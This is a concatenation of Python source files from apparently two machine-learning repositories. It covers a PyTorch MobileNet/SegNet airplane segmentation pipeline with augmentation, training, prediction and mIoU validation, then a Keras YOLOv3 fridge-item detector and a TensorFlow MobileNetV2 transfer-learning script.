    # Augmentation pipeline: the same random transform is applied to the
    # image and its ground-truth mask.
    p = Augmentor.Pipeline(opt.Images)  # read images
    p.ground_truth(opt.Masks)  # pair each mask with its image so both get identical transforms
    p.rotate(probability=1, max_left_rotation=5, max_right_rotation=5)  # rotate within +/-5 degrees
    p.shear(probability=1,max_shear_left=15,max_shear_right=15)  # random shear
    p.flip_left_right(probability=0.5)  # horizontal flip with probability 0.5
    p.zoom_random(probability=0.5, percentage_area=0.8)  # random zoom
    p.flip_top_bottom(probability=0.5)  # vertical flip with probability 0.5
    p.sample(3)  # generate 3 augmented samples
    os.remove("%s/%s.jpg"%(imgway_1,data[index]))  # drop the source image so it is not mixed with outputs
    os.remove("%s/%s.jpg" % (opt.Masks, data[index]))  # drop the source mask for the same reason
    # Rename the augmented outputs and move them to the final folders.
    for filename in os.listdir(r"%s" % imgway_2):
        name = filename[:9]
        if name =="Augmentor":  # file is an image (Augmentor's image-output prefix)
            name_1 = []  # collect the numeric part of the image name
            name_1.append(filename[23:34])  # slice digits + extension; assumes Augmentor's fixed name layout — TODO confirm
            img = cv2.imread("%s" % imgway_2 + "/" + filename,-1)
            name1_1 = name_1[0]
            name2_1 = name1_1[:-6]+str(n1)+ name1_1[6:]  # rename based on the original name plus a counter
            cv2.imwrite("%s/%s" % (JPG_RIGHT, name2_1 )+".jpg", img)
            n1+=1
            if n1==4:  # 3 samples per source image; wrap the counter
                n1=1
        else:  # file is a mask
            name_2 = []  # collect the numeric part of the mask name
            name_2.append(filename[31:42])  # slice digits + extension
            img_2 = cv2.imread("%s" % imgway_2 + "/" + filename, -1)
            name1_2 = name_2[0]
            name2_2 = name1_2[:-6] + str(n2) + name1_2[6:]  # rename based on the original name plus a counter
            cv2.imwrite("%s/%s" % (PNG_RIGHT, name2_2)+".png", img_2)
            n2 += 1
            if n2==4:  # wrap the counter after 3 samples
                n2=1
--- FILE SEPARATOR ---
import os
import random
# Split the dataset image names into train/val lists written to txt files.
val_percent = 0.1    # fraction of images used for validation
train_percent = 0.9  # documented split ratio (not read below)
imagepath = 'dataset/jpg_right'
txtsavepath = 'dataset'

total_img = os.listdir(imagepath)
num = len(total_img)
indices = range(num)  # renamed from `list`, which shadowed the builtin
tv = int(num * val_percent)  # number of validation images
tr = int(num - tv)           # number of training images
# One random sample suffices: the complement of the train subset (size tv)
# becomes the validation set.  The original also drew an unused
# `num_trainval` sample; dropping it only changes the (unseeded) RNG stream.
num_train = random.sample(indices, tr)
train_set = set(num_train)  # O(1) membership test instead of O(n) list scan

# `with` guarantees both files are closed even if a write fails.
with open('dataset/train.txt', 'w') as ftrain, open('dataset/val.txt', 'w') as fval:
    for i in indices:
        name = total_img[i][:-4] + '\n'  # strip the 4-char extension (".jpg")
        if i in train_set:
            ftrain.write(name)
        else:
            fval.write(name)
        print("True")
        print(i + 1)
--- FILE SEPARATOR ---
import torch
from torch.nn import *
from torch.nn.functional import relu6
class Conv_block(Module):
    """First convolution block: ZeroPad -> 3x3 Conv -> BatchNorm -> ReLU6."""

    def __init__(self, inplanes, outplanes, strides):
        super(Conv_block, self).__init__()
        # Explicit zero padding followed by an unpadded conv reproduces
        # 'same'-style padding for the 3x3 kernel.
        self.zeropad = ZeroPad2d(padding=1)
        self.conv = Conv2d(inplanes, outplanes, kernel_size=3, stride=strides, padding=0)
        self.BN = BatchNorm2d(outplanes, momentum=0.1)

    def forward(self, x):
        # Chain the layers; ReLU6 is the MobileNet-style clipped activation.
        return relu6(self.BN(self.conv(self.zeropad(x))))
class depthwise_block(Module):
    """Depthwise-separable block (MobileNet v1 style): 3x3 depthwise conv
    followed by a 1x1 pointwise conv, each with BatchNorm and ReLU6."""

    def __init__(self, inplanes, outplanes, strides):
        super(depthwise_block, self).__init__()
        self.zeropad = ZeroPad2d(padding=1)
        # groups=inplanes makes this a depthwise convolution: one filter per
        # input channel, so input and output channel counts match here.
        self.DW = Conv2d(inplanes, inplanes,
                         kernel_size=3, stride=strides,
                         padding=0, groups=inplanes,
                         bias=False)
        self.BN_1 = BatchNorm2d(inplanes, momentum=0.1)
        self.BN_2 = BatchNorm2d(outplanes, momentum=0.1)
        # 1x1 pointwise conv mixes channels and changes the width.
        self.conv = Conv2d(inplanes, outplanes, kernel_size=1, stride=1)

    def forward(self, x):
        depthwise = relu6(self.BN_1(self.DW(self.zeropad(x))))
        pointwise = relu6(self.BN_2(self.conv(depthwise)))
        return pointwise
class Mobilenet(Module):
    """MobileNet-style encoder: one standard conv block followed by five
    depthwise-separable blocks."""

    # NOTE(review): the four class attributes below are not read by
    # __init__/forward (the blocks are built with hard-coded values);
    # they appear to be leftover configuration tables.
    cfg_filter=[32,64,128,128,256,256]  # per-block in/out channel widths
    cfg_stride=[1,2,1,2,1]  # per-block strides
    cfg_block=[]  # intended to collect the instantiated blocks (unused)
    layer_data=[]  # intended to collect per-block outputs (unused)

    def __init__(self):
        super(Mobilenet, self).__init__()
        self.conv_block=Conv_block(3,32,2)  # stem: 3 -> 32 channels, stride 2
        self.block_1=depthwise_block(32,64,1)
        self.block_2=depthwise_block(64,128,2)
        self.block_3=depthwise_block(128,128,1)
        self.block_4=depthwise_block(128,256,2)
        self.block_5=depthwise_block(256,256,1)

    def forward(self,inputs):
        # Feed the input through the stem and the five blocks in order.
        x=inputs
        x=self.conv_block(x)
        x=self.block_1(x)
        x=self.block_2(x)
        x=self.block_3(x)
        x=self.block_4(x)
        x=self.block_5(x)
        return x
# Quick smoke test of the encoder network.
if __name__ =="__main__":
    model=Mobilenet()
    # Build an NHWC random tensor and permute to NCHW as the model expects.
    inputs=torch.randn(1,416,416,3).permute(0,3,1,2)
    # inputs=torch.randn(1,3,416,416)
    # layers_list=model(inputs)
    outputs = model(inputs)
    print("layers_3 shape:" )
    # print(layers_list[2].shape)
    print(outputs.shape)
--- FILE SEPARATOR ---
from segnet_ import Airplanesnet
from PIL import Image
import numpy as np
import torch
import argparse
import cv2
import copy
import os
parser = argparse.ArgumentParser()
parser.add_argument('--samples', type=str, default='D:/untitled/.idea/SS_torch/samples', help='samples')
parser.add_argument('--outputs', type=str, default='D:/untitled/.idea/SS_torch/outputs', help='outputs')
parser.add_argument('--weights', type=str, default='D:/untitled/.idea/SS_torch/weights/SS_weight_3.pth', help='weights')
opt = parser.parse_args()
print(opt)

colors = [[0,0,0],[255,0,0]]  # per-class overlay colors (one entry per class)
NCLASSES = 2
BATCH_SIZE=1
img_way=opt.samples
img_save=opt.outputs

device=torch.device("cuda:0"if torch.cuda.is_available() else "cpu")  # use GPU when available
model=Airplanesnet(NCLASSES,BATCH_SIZE)  # build the model
model.load_state_dict(torch.load(opt.weights))  # load trained weights
model.to(device)  # move the network to the device

# Predict a segmentation overlay for every image in the samples folder.
for jpg in os.listdir(r"%s" %img_way):
    name = jpg[:-4]  # file name without its 4-char extension
    with torch.no_grad():
        image=cv2.imread("%s" % img_way + "/" + jpg)
        old_image = copy.deepcopy(image)  # keep the original for the final overlay
        old_image = np.array(old_image)
        orininal_h = image.shape[0]  # original height
        orininal_w = image.shape[1]  # original width, used to restore size later
        image = cv2.resize(image, dsize=(416, 416))  # resize to the model input size
        image = image / 255.0  # normalize to [0, 1]
        image = torch.from_numpy(image)
        image = image.permute(2, 0, 1)  # HWC -> CHW
        image = torch.unsqueeze(image, dim=0)  # add batch dim to match model input
        image = image.type(torch.FloatTensor)  # model expects float input
        image = image.to(device)  # run on the selected device
        predict = model(image).cpu()
        predict = torch.squeeze(predict)  # drop the batch dimension
        predict =predict.permute(1, 2, 0)
        predict = predict.numpy()
        pr=predict.argmax(axis=-1)  # per-pixel argmax over class scores
        seg_img = np.zeros((416, 416,3))  # blank canvas for class coloring
        # Paint each class region with its color.
        for c in range(NCLASSES):
            seg_img[:, :, 0] += ((pr[:, :] == c) * (colors[c][0])).astype('uint8')
            seg_img[:, :, 1] += ((pr[:, :] == c) * (colors[c][1])).astype('uint8')
            seg_img[:, :, 2] += ((pr[:, :] == c) * (colors[c][2])).astype('uint8')
        seg_img = cv2.resize(seg_img,(orininal_w,orininal_h))
        seg_img = np.array(seg_img)
        # Blend the colored mask over the original image.
        # NOTE(review): the 6th/7th positional args of addWeighted are dst and
        # dtype — confirm writing into old_image and forcing CV_32F is intended.
        result = cv2.addWeighted(seg_img, 0.3, old_image, 0.7, 0., old_image, cv2.CV_32F)
        cv2.imwrite("%s/%s" % (img_save, name) + ".jpg", result)
        print("%s.jpg ------>done!!!" % name)
--- FILE SEPARATOR ---
import torch
import numpy as np
from torch.nn import *
from torch.nn import functional as F
from mobilenet_ import Mobilenet
class Segnet(Module):
    """Decoder: takes the (N, 256, H, W) encoder feature map, applies three
    upsample+conv stages (x8 spatial upscaling overall) and projects to
    `num_classes` channels.

    Bug fix: `conv_block`/`BN_block` were *class-level* lists, so every new
    instantiation appended three more layers to the shared lists and later
    instances silently reused the first instance's modules (their ModuleLists
    ended up with 6 entries).  The lists are now built per instance.
    """

    cfg_filter = [256, 128, 64, 32]  # channel widths of the upsampling stages

    def __init__(self, num_classes):
        super(Segnet, self).__init__()
        self.zeropad = ZeroPad2d(padding=1)
        self.conv_1 = Conv2d(256, 256, kernel_size=3, padding=0)
        self.conv_2 = Conv2d(32, num_classes, kernel_size=3, padding=1)
        self.BN_1 = BatchNorm2d(256, momentum=0.1)
        self.upsample = Upsample(scale_factor=2)
        # Build the three conv+BN pairs per instance (see class docstring).
        conv_block = []
        BN_block = []
        for i in range(len(self.cfg_filter) - 1):
            conv_block.append(Conv2d(self.cfg_filter[i],
                                     self.cfg_filter[i + 1],
                                     kernel_size=3,
                                     padding=0))
            BN_block.append(BatchNorm2d(self.cfg_filter[i + 1]))
        self.conv_block = ModuleList(conv_block)
        self.BN_block = ModuleList(BN_block)

    def forward(self, o):
        # input: (N, 256, H, W)
        o = self.zeropad(o)
        o = self.conv_1(o)
        o = self.BN_1(o)
        # Three upsampling stages: each doubles the spatial size and halves
        # (roughly) the channel width per cfg_filter.
        for j in range(3):
            o = self.upsample(o)
            o = self.zeropad(o)
            o = self.conv_block[j](o)
            o = self.BN_block[j](o)
        outputs = self.conv_2(o)
        return outputs
# Encoder + decoder combined into the full segmentation network.
class Airplanesnet(Module):
    """Full segmentation net: Mobilenet encoder followed by a Segnet decoder."""

    def __init__(self, classes1, BATCH_SIZE):
        super(Airplanesnet, self).__init__()
        self.encoder_part = Mobilenet()  # backbone imported from mobilenet_
        self.decoder_part = Segnet(classes1)
        # Kept as attributes for callers that inspect the configuration.
        self.classes = classes1
        self.batch_size = BATCH_SIZE

    def forward(self, input_1):
        encoded = self.encoder_part(input_1)
        decoded = self.decoder_part(encoded)
        return decoded
# Quick smoke test of the decoder network.
if __name__ =="__main__":
    model=Airplanesnet(classes1=2,BATCH_SIZE=1)
    inputs_1=torch.Tensor(torch.randn(1,3,416,416))
    outputs_1=model(inputs_1)
    # outputs=outputs[3]
    print("outputs shape:" )
    print(outputs_1.shape)
--- FILE SEPARATOR ---
import torch
import cv2
import os
import argparse
import numpy as np
from PIL import Image
from torch.nn import *
from torch.optim import Adam
from torch.utils.data import Dataset,DataLoader
from segnet_ import Airplanesnet
BATCH_SIZE1=1  # training batch size
BATCH_SIZE2=1  # validation batch size
NUM_CLASSES=2  # number of segmentation classes
LR=1e-4  # learning rate
EPOCH=20  # number of training epochs
parser = argparse.ArgumentParser()
parser.add_argument('--gpu',action='store_true',default=True,help='whether use gpu')
parser.add_argument('--train_txt', type=str, default='D:/untitled/.idea/SS_torch/dataset/train.txt', help='about trian')
parser.add_argument('--val_txt', type=str, default='D:/untitled/.idea/SS_torch/dataset/val.txt', help='about validation')
opt = parser.parse_args()
print(opt)
txt_1 = opt.train_txt
txt_2 = opt.val_txt
# Custom Dataset: reads sample names from a txt file and loads the matching
# image/label pairs from the fixed dataset folders.
class AirplanesDataset(Dataset):
    """Dataset of (image, label) pairs for airplane segmentation.

    Args:
        txt_path: text file with one sample name (no extension) per line.
    """

    def __init__(self, txt_path):
        super(AirplanesDataset, self).__init__()
        # `with` closes the file handle (the original left it open).
        with open(txt_path, "r") as paths:
            self.data = [line.rstrip('\n') for line in paths]
        self.len = len(self.data)

    def __getitem__(self, index):
        # -1 = cv2.IMREAD_UNCHANGED
        image = cv2.imread("D:/untitled/.idea/SS_torch/dataset/jpg_right/%s" % self.data[index] + ".jpg", -1)
        label = cv2.imread("D:/untitled/.idea/SS_torch/dataset/png_right/%s" % self.data[index] + ".png", -1)
        image = cv2.resize(image, dsize=(416, 416))
        label = cv2.resize(label, dsize=(416, 416))
        image = torch.from_numpy(image)
        label = torch.from_numpy(label)
        image = image / 255.0  # normalize to [0, 1]
        # Resizing interpolates mask values; snap them back to the two classes.
        label[label >= 0.5] = 1
        label[label < 0.5] = 0
        image = image.permute(2, 0, 1)  # HWC -> CHW for the model
        return image, label

    def __len__(self):
        return self.len
train_dataset = AirplanesDataset(txt_1)  # training set
# Load the training data, shuffled and split into mini-batches.
train_loader = DataLoader(dataset=train_dataset,
                          batch_size=BATCH_SIZE1,
                          shuffle=True)
criterion = CrossEntropyLoss()  # loss
model=Airplanesnet(NUM_CLASSES,BATCH_SIZE1)
optimizer = Adam(model.parameters(),  # optimizer
                 lr=LR)
device=torch.device("cuda:0"if torch.cuda.is_available() else "cpu")  # use GPU when available
model.to(device)  # move the network to the device
# Resume from previously saved weights.
model.load_state_dict(torch.load('D:/untitled/.idea/SS_torch/weights/SS_weight_2.pth'))
# Training function: one full pass over train_loader.
def train(epoch):
    """Run one training epoch over `train_loader`, updating `model` in place;
    prints the average loss every 100 batches and saves the weights at the
    end of the epoch."""
    running_loss = 0.0
    for batch_idx, data in enumerate(train_loader, 0):
        image, label = data
        image, label = image.to(device), label.to(device)
        optimizer.zero_grad()
        # forward + backward + update
        image = image.type(torch.FloatTensor)  # model expects float input
        image = image.to(device)  # .type() moved the tensor back to CPU
        outputs = model(image)
        loss = criterion(outputs, label.long())
        # NOTE(review): retain_graph=True kept from the original; it should not
        # be needed for a standard per-batch backward — confirm before removing.
        loss.backward(retain_graph=True)
        optimizer.step()
        running_loss += loss.item()
        if batch_idx % 100 == 99:
            print('[epoch: %d,idex: %2d] loss:%.3f' % (epoch+1,batch_idx+1,running_loss/322))
            running_loss = 0.0  # bug fix: was misspelled `runing_loss`, so the accumulator never reset
    torch.save(model.state_dict(),f='D:/untitled/.idea/SS_torch/weights/SS_weight_3.pth')  # save weights
# Run the full training schedule.
for epoch in range(EPOCH):  # number of epochs
    train(epoch)
--- FILE SEPARATOR ---
from segnet_ import Airplanesnet
import numpy as np
import torch
import argparse
import copy
import cv2
NCLASSES = 2  # number of segmentation classes
BATCH_SIZE=1
# File load paths.
parser = argparse.ArgumentParser()
parser.add_argument('--val_txt', type=str, default='D:/untitled/.idea/SS_torch/dataset/val.txt', help='about validation')
parser.add_argument('--weights', type=str, default='D:/untitled/.idea/SS_torch/weights/SS_weight_3.pth', help='weights')
opt = parser.parse_args()
print(opt)
txt_path = opt.val_txt
weight=opt.weights
__all__ = ['SegmentationMetric']
class SegmentationMetric(object):
    """Confusion-matrix based segmentation metrics (pixel accuracy, mIoU, FWIoU).

    Bug fix: Frequency_Weighted_Intersection_over_Union referenced
    `self.confusion_matrix`, but the attribute is `self.confusionMatrix`,
    so the method always raised AttributeError.
    """

    def __init__(self, numClass):
        self.numClass = numClass
        self.confusionMatrix = np.zeros((self.numClass,) * 2)

    def pixelAccuracy(self):
        # overall pixel accuracy across all classes: (TP + TN) / total
        acc = np.diag(self.confusionMatrix).sum() / self.confusionMatrix.sum()
        acc = round(acc, 5)
        return acc

    def classPixelAccuracy(self):
        # per-class accuracy (precision): TP / (TP + FP)
        classAcc = np.diag(self.confusionMatrix) / self.confusionMatrix.sum(axis=1)
        return classAcc

    def meanPixelAccuracy(self):
        # mean of the per-class accuracies, ignoring NaN (absent classes)
        classAcc = self.classPixelAccuracy()
        meanAcc = np.nanmean(classAcc)
        return meanAcc

    def meanIntersectionOverUnion(self):
        # IoU = TP / (TP + FP + FN), averaged over classes
        intersection = np.diag(self.confusionMatrix)
        union = np.sum(self.confusionMatrix, axis=1) + np.sum(self.confusionMatrix, axis=0) - np.diag(
            self.confusionMatrix)
        IoU = intersection / union
        mIoU = np.nanmean(IoU)
        mIoU = round(mIoU, 4)
        return mIoU

    def genConfusionMatrix(self, imgPredict, imgLabel):
        # Count (label, prediction) pairs; out-of-range (unlabeled) pixels
        # are masked out before counting.
        mask = (imgLabel >= 0) & (imgLabel < self.numClass)
        label = self.numClass * imgLabel[mask] + imgPredict[mask]
        count = np.bincount(label, minlength=self.numClass ** 2)
        confusionMatrix = count.reshape(self.numClass, self.numClass)
        return confusionMatrix

    def Frequency_Weighted_Intersection_over_Union(self):
        # FWIoU = sum over classes of (class frequency) * (class IoU)
        freq = np.sum(self.confusionMatrix, axis=1) / np.sum(self.confusionMatrix)
        iu = np.diag(self.confusionMatrix) / (
                np.sum(self.confusionMatrix, axis=1) + np.sum(self.confusionMatrix, axis=0) -
                np.diag(self.confusionMatrix))
        FWIoU = (freq[freq > 0] * iu[freq > 0]).sum()
        return FWIoU

    def addBatch(self, imgPredict, imgLabel):
        # Accumulate one batch into the running confusion matrix.
        assert imgPredict.shape == imgLabel.shape
        self.confusionMatrix += self.genConfusionMatrix(imgPredict, imgLabel)

    def reset(self):
        self.confusionMatrix = np.zeros((self.numClass, self.numClass))
# Read the image names listed in val.txt.
# NOTE(review): the file handle is never closed; consider a with-block.
paths = open("%s" % txt_path, "r")
data = []
for lines in paths:
    path = lines.rstrip('\n')
    data.append(path)

device=torch.device("cuda:0"if torch.cuda.is_available() else "cpu")  # use GPU when available
model=Airplanesnet(NCLASSES,BATCH_SIZE)  # build the model
model.load_state_dict(torch.load(opt.weights))  # load trained weights
model.to(device)

sum_1 = 0  # accumulates per-image validation accuracy
sum_2 = 0  # accumulates per-image validation mIoU
for i in range(len(data)):
    image = cv2.imread("D:/untitled/.idea/SS_torch/dataset/jpg_right/%s" % data[i] + ".jpg", -1)
    label = cv2.imread("D:/untitled/.idea/SS_torch/dataset/png_right/%s" % data[i] + ".png", -1)
    orininal_h = image.shape[0]  # original image height
    orininal_w = image.shape[1]  # original image width
    image = cv2.resize(image, dsize=(416, 416))
    label = cv2.resize(label, dsize=(416, 416))
    # Resizing interpolates mask values; snap them back to the two classes.
    label[label >= 0.5] = 1
    label[label < 0.5] = 0
    image = image / 255.0  # normalize to [0, 1]
    image = torch.from_numpy(image)
    image = image.permute(2, 0, 1)  # HWC -> CHW
    image = torch.unsqueeze(image, dim=0)  # add batch dim to match model input
    image = image.type(torch.FloatTensor)  # model expects float input
    image = image.to(device)  # run on the selected device
    predict = model(image).cpu()
    predict = torch.squeeze(predict)  # drop the batch dimension
    predict = predict.permute(1, 2, 0)
    predict = predict.detach().numpy()
    prc = predict.argmax(axis=-1)  # per-pixel argmax over class scores
    # Evaluate mIoU and accuracy for this image.
    imgPredict =prc
    imgLabel = label
    metric = SegmentationMetric(2)
    metric.addBatch(imgPredict, imgLabel)
    acc = metric.pixelAccuracy()
    sum_1+=acc
    mIoU = metric.meanIntersectionOverUnion()
    sum_2+=mIoU
    print("%s.jpg :" % data[i])
    print("accuracy: "+str(acc*100)+" %")
    print("mIoU: " +str(mIoU))
    print("-------------------")

# Average accuracy and mIoU over all images.
sum_1=sum_1/len(data)
sum_2=sum_2/len(data)
sum_1 = round(sum_1,5)
sum_2 = round(sum_2,4)
print("M accuracy: "+str(sum_1*100)+" %")
print("M mIoU: " +str(sum_2))
|
[
"/data more.py",
"/maketxt.py",
"/mobilenet_.py",
"/predict_.py",
"/segnet_.py",
"/training.py",
"/validation.py"
] |
01090841589/Fridge-Monitor
|
import os
import sys
import csv
import argparse
from keras_yolo3.yolo import YOLO, detect_video
from PIL import Image
from timeit import default_timer as timer
from Utils.utils import load_extractor_model, load_features, parse_input, detect_object
import test
from Utils import utils
import pandas as pd
import numpy as np
from Utils.Get_File_Paths import GetFileList
import random
# Resolve the project layout relative to this file and make Utils importable.
src_path = os.path.dirname(os.path.abspath(__file__))
utils_path = os.path.join(src_path, "Utils")
sys.path.append(src_path)
sys.path.append(utils_path)
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"  # silence TensorFlow warnings
# Folder layout used by the detector.
data_folder = os.path.join(src_path, "Data")
image_test_folder = os.path.join(data_folder, "Test_Images")
detection_results_folder = os.path.join(data_folder, "Results")
detection_results_file = os.path.join(detection_results_folder, "Detection_Results.csv")
model_folder = os.path.join(data_folder, "Model_Weights")
model_weights = os.path.join(model_folder, "trained_weights_final.h5")
model_classes = os.path.join(model_folder, "data_classes.txt")
anchors_path = os.path.join(src_path, "keras_yolo3", "model_data", "yolo_anchors.txt")
if __name__ == "__main__":
    # Collect test inputs and split them into images and videos by extension.
    input_paths = GetFileList(image_test_folder)
    # Bug fix: ".jpg" was listed twice; ".jpeg" was clearly intended
    # (mirroring ".mpeg"/".mpg" in the video endings below).
    img_endings = (".jpg", ".jpeg", ".png")
    vid_endings = (".mp4", ".mpeg", ".mpg", ".avi")
    input_image_paths = []
    input_video_paths = []
    for item in input_paths:
        if item.endswith(img_endings):
            input_image_paths.append(item)
        elif item.endswith(vid_endings):
            input_video_paths.append(item)

    output_path = detection_results_folder
    if not os.path.exists(output_path):
        os.makedirs(output_path)

    # Build the YOLO detector from the trained weights.
    yolo = YOLO(
        **{
            "model_path": model_weights,
            "anchors_path": anchors_path,
            "classes_path": model_classes,
            "score": 0.1,  # prediction score threshold
            "gpu_num": 1,
            "model_image_size": (416, 416),
        }
    )

    # One row per detection box.
    out_df = pd.DataFrame(
        columns=[
            "image", "image_path", "xmin", "ymin", "xmax", "ymax", "label", "confidence", "x_size", "y_size",
        ]
    )

    # Class names, one per line; `with` closes the handle (was leaked before).
    with open(model_classes, "r") as class_file:
        input_labels = [line.rstrip("\n") for line in class_file.readlines()]
    print("Found {} input labels: {} ...".format(len(input_labels), input_labels))

    if input_image_paths:
        print(
            "Found {} input images: {} ...".format(
                len(input_image_paths),
                [os.path.basename(f) for f in input_image_paths[:5]],
            )
        )
        start = timer()
        text_out = ""

        # This is for images
        for i, img_path in enumerate(input_image_paths):
            print(img_path)
            prediction, image = detect_object(
                yolo,
                img_path,
                save_img=True,
                save_img_path=detection_results_folder,
                postfix='_detect',
            )
            y_size, x_size, _ = np.array(image).shape
            for single_prediction in prediction:
                # NOTE(review): DataFrame.append was removed in pandas >= 2.0;
                # fine for the pinned version, otherwise switch to pd.concat.
                out_df = out_df.append(
                    pd.DataFrame(
                        [
                            [
                                os.path.basename(img_path.rstrip("\n")),
                                img_path.rstrip("\n"),
                            ]
                            + single_prediction
                            + [x_size, y_size]
                        ],
                        columns=[
                            "image", "image_path", "xmin", "ymin", "xmax", "ymax", "label", "confidence", "x_size", "y_size",
                        ],
                    )
                )
        end = timer()
        print(
            "Processed {} images in {:.1f}sec - {:.1f}FPS".format(
                len(input_image_paths),
                end - start,
                len(input_image_paths) / (end - start),
            )
        )
    out_df.to_csv(detection_results_file, index=False)
    yolo.close_session()

    # Post-process: keep, per label, the highest-confidence detection and crop it.
    data_folder = os.path.join(src_path, 'Data\\Results\\Detection_Results.csv')
    label_path = os.path.join(src_path, 'Data\\Model_Weights\\data_classes.txt')
    with open(label_path, "r") as class_file:
        input_labels = [line.rstrip("\n") for line in class_file.readlines()]

    rownum = 0
    # Clear previous crops.
    for file in os.scandir(src_path + '\\crop_img'):
        os.remove(file.path)

    dec_img = dict()
    with open(data_folder, newline='') as csvfile:
        reader = csv.reader(csvfile)
        for r in reader:
            if rownum == 0:
                header = r
                rownum += 1
                continue
            img = Image.open(r[1])
            print(rownum, float(r[7]))
            # Keep only the highest-confidence box per label.
            # NOTE(review): indexing input_labels with int(r[6]) assumes the
            # CSV's label column stores a numeric class id — confirm.
            if not dec_img.get(input_labels[int(r[6])]):
                dec_img[input_labels[int(r[6])]] = [r[7], r[1], int(r[2]), int(r[3]), int(r[4]), int(r[5])]
            else:
                if dec_img[input_labels[int(r[6])]][0] < r[7]:
                    dec_img[input_labels[int(r[6])]] = [r[7], r[1], int(r[2]), int(r[3]), int(r[4]), int(r[5])]
            rownum += 1

    # Crop each winning box out of its source image and save as RGB jpg.
    for key, value in dec_img.items():
        print(key, value)
        img = Image.open(value[1])
        area = (value[2], value[3], value[4], value[5])
        cropped_img = img.crop(area)
        cropped_img = cropped_img.convert("RGB")
        cropped_img.save('.\\crop_img\\' + key + '.jpg')
--- FILE SEPARATOR ---
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#@title MIT License
#
# Copyright (c) 2017 François Chollet # IGNORE_COPYRIGHT: cleared by OSS licensing
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  # dataset download may use an unverified connection
import os
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow_datasets as tfds
tfds.disable_progress_bar()

# Load horses_or_humans with an 80/10/10 train/validation/test split.
(raw_train, raw_validation, raw_test), metadata = tfds.load(
    'horses_or_humans',
    split=['train[:80%]', 'train[80%:90%]', 'train[90%:]'],
    with_info=True,
    as_supervised=True,
)
print(raw_train)
print(raw_validation)
print(raw_test)

get_label_name = metadata.features['label'].int2str  # int label -> class name

# for image, label in raw_train.take(2):
#     plt.figure()
#     plt.imshow(image)
#     plt.title(get_label_name(label))

IMG_SIZE = 160 # All images will be resized to 160x160
def format_example(image, label):
    """Cast to float32, scale pixels to [-1, 1], and resize to IMG_SIZE."""
    scaled = (tf.cast(image, tf.float32) / 127.5) - 1
    resized = tf.image.resize(scaled, (IMG_SIZE, IMG_SIZE))
    return resized, label
# Apply preprocessing to each split.
train = raw_train.map(format_example)
validation = raw_validation.map(format_example)
test = raw_test.map(format_example)

BATCH_SIZE = 32
SHUFFLE_BUFFER_SIZE = 1000

train_batches = train.shuffle(SHUFFLE_BUFFER_SIZE).batch(BATCH_SIZE)
validation_batches = validation.batch(BATCH_SIZE)
test_batches = test.batch(BATCH_SIZE)

# Grab one batch to probe tensor shapes.
for image_batch, label_batch in train_batches.take(1):
    pass
image_batch.shape

IMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)
# Create the base model from the pre-trained model MobileNet V2
base_model = tf.keras.applications.MobileNetV2(input_shape=IMG_SHAPE,
                                               include_top=False,
                                               weights='imagenet')
feature_batch = base_model(image_batch)
print(feature_batch.shape)

base_model.trainable = False  # freeze the backbone for feature extraction
# Let's take a look at the base model architecture
base_model.summary()

# Classification head: global pooling + a single logit.
global_average_layer = tf.keras.layers.GlobalAveragePooling2D()
feature_batch_average = global_average_layer(feature_batch)
print(feature_batch_average.shape)

prediction_layer = tf.keras.layers.Dense(1)
prediction_batch = prediction_layer(feature_batch_average)
print(prediction_batch.shape)

model = tf.keras.Sequential([
    base_model,
    global_average_layer,
    prediction_layer
])

base_learning_rate = 0.0001
# NOTE(review): `lr=` is the legacy Keras argument (newer releases use
# `learning_rate=`); fine for the pinned TF version — confirm.
model.compile(optimizer=tf.keras.optimizers.RMSprop(lr=base_learning_rate),
              loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
              metrics=['accuracy'])
model.summary()
len(model.trainable_variables)

initial_epochs = 1
validation_steps=20

loss0,accuracy0 = model.evaluate(validation_batches, steps = validation_steps)
print("initial loss: {:.2f}".format(loss0))
print("initial accuracy: {:.2f}".format(accuracy0))

# Stage 1: train only the new classification head.
history = model.fit(train_batches,
                    epochs=initial_epochs,
                    validation_data=validation_batches)

acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']

# plt.figure(figsize=(8, 8))
# plt.subplot(2, 1, 1)
# plt.plot(acc, label='Training Accuracy')
# plt.plot(val_acc, label='Validation Accuracy')
# plt.legend(loc='lower right')
# plt.ylabel('Accuracy')
# plt.ylim([min(plt.ylim()),1])
# plt.title('Training and Validation Accuracy')
# plt.subplot(2, 1, 2)
# plt.plot(loss, label='Training Loss')
# plt.plot(val_loss, label='Validation Loss')
# plt.legend(loc='upper right')
# plt.ylabel('Cross Entropy')
# plt.ylim([0,1.0])
# plt.title('Training and Validation Loss')
# plt.xlabel('epoch')
# plt.show()

# Stage 2: unfreeze the top of the backbone and fine-tune.
base_model.trainable = True
# Let's take a look to see how many layers are in the base model
print("Number of layers in the base model: ", len(base_model.layers))
# Fine-tune from this layer onwards
fine_tune_at = 100
